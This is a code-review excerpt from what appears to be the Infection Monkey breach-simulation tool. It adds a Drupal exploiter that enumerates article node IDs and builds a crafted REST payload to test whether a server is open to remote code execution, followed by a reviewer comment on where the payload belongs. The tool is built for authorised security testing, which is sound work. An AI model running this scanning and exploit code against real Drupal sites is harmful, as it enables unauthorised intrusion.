monkey/infection_monkey/exploit/drupal.py

```diff
@@ -0,0 +1,175 @@
+    while lower < upper:
+        u = build_url(base_url, str(lower))
+        r = requests.get(u)
+        if r.status_code == 200:  # found an article
+            articles.add(lower)
+        if check_drupal_cache(r):
+            LOG.info(f'Found a cached article at: {lower}, skipping')
+        lower += 1
+    return articles
+
+
+class DrupalExploiter(WebRCE):
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Drupal Server'
+    DRUPAL_PORTS = [[80, False], [443, True]]
+
+    def __init__(self, host):
+        super(DrupalExploiter, self).__init__(host)
+
+    def get_exploit_config(self):
+        """
+        We override this function because the exploits requires a special extension in the URL, "node",
+        e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
+        :return: the Drupal exploit config
+        """
+        exploit_config = super(DrupalExploiter, self).get_exploit_config()
+        exploit_config['url_extensions'] = ['node/']
+        return exploit_config
+
+    def add_vulnerable_urls(self, potential_urls, stop_checking=False):
+        """
+        We need a specific implementation of this function in order to add the URLs *with the node IDs*.
+        We therefore check, for every potential URL, all possible node IDs.
+        :param potential_urls: Potentially-vulnerable URLs
+        :param stop_checking: Stop if one vulnerable URL is found
+        :return: None (in-place addition)
+        """
+        for url in potential_urls:
+            node_ids = find_articles(url)
+            if node_ids is None:
+                LOG.info('Could not find a Drupal node to attack')
+                continue
+            for node_id in node_ids:
+                node_url = build_url(url, str(node_id))
+                if self.check_if_exploitable(node_url):
+                    self.add_vuln_url(url)  # Where is this used?
+                    self.vulnerable_urls.append(node_url)
+                    if stop_checking:
+                        break
+        if not self.vulnerable_urls:
+            LOG.info("No vulnerable urls found")
+
+    def check_if_exploitable(self, url):
+        """
+        Check if a certain URL is exploitable.
+        We use this specific implementation (and not simply run self.exploit) because this function does not "waste"
+        a vulnerable URL. Namely, we're not actually exploiting, merely checking using a heuristic.
+        :param url: Drupal's URL and port
+        :return: Vulnerable URL if exploitable, otherwise False
+        """
+        payload = {
+            "_links": {
+                "type": {
+                    "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"
+                }
+            },
+            "type": {
+                "target_id": "article"
+            },
+            "title": {
+                "value": "My Article"
+            },
+            "body": {
+                "value": ""
+            }
+        }
```

Comment:
Payload should be exported, at least, to the top of the file. That way 1. If we need to add/change payloads it's far more easy to find. 2. When we try to understand what this function does, we are not forced to read the whole payload, which is a different topic/abstraction level.

Reply:
cf776063